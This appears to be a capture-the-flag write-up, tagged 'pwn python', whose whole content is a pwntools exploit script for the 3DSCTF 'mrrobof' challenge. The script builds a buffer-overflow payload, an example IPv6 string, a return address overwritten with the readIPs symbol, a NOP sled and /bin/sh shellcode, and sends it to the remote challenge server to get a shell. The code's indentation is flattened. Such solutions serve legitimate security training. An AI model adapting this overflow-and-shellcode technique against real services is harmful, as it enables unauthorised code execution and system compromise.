Tags: pwn python
Rating:
```
from pwn import *
binary = "mrrobof" #Renamed just because
chall, port = "mrrobof01.3dsctf.org", 8006
e = ELF(binary)
context.log_level = "DEBUG"
DEBUG = False
def getpipe():
if DEBUG:
return process(binary)
else:
return remote(chall, port)
input_len = 0x1ff00
"""Send an example ip str + someint*0x100 + randrange(0x2,0x28)"""
ip_ex = "2001:0db8:85a3:0000:0000:8a2e:0370:7334."
shellcode = asm(shellcraft.linux.sh())
"""Heh, might not be PIE after all. But there's something I missed again."""
readIPs = e.symbols['readIPs'] #Again?
control_eip = flat("A"*12, readIPs)
padding = "\x90"*(input_len - len(shellcode) - len(ip_ex) - len(control_eip))
code = padding + shellcode
payload = ip_ex
payload += control_eip
payload += code
payload += '\x90'*3 #Need counting byte of 0x2-0x28 to pass, last gets chopped
print "Length:", hex(len(payload))
open("payload","w").write(payload)
p = getpipe()
p.sendline(payload)
print p.recv()
time.sleep(0.3)
if DEBUG and p.poll() == None:
print p.recv()
if not DEBUG:
print p.recv()
```
